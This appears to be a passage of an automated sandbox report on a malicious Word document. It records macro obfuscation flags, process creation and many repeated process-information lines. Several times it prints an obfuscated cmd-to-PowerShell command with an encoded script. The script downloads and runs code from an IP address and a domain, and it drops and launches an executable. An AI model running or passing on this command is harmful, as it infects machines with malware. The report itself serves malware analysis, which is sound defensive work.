      Source: Binary string: ws\symbols\dll\System.pdbc5 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb2 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ??\C:\Windows\System.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.406637790.000000001B4B0000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb8 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: attacker1.docInitial sample: OLE document summary bytes = 23552
      Source: attacker1.docInitial sample: OLE document summary manager = Mr. Granville McGlynn
      Source: attacker1.docInitial sample: OLE summary subject = West Virginia Samanta
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Data Obfuscation:

      barindex
      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
      Source: attacker1.docStream path 'Macros/VBA/ThisDocument' : High number of string operations
      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisDocumentName: ThisDocument
      Source: ~DF527BC4B1A394C70E.TMP.0.drStream path 'VBA/ThisDocument' : High number of string operations
      Obfuscated command line foundShow sources
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
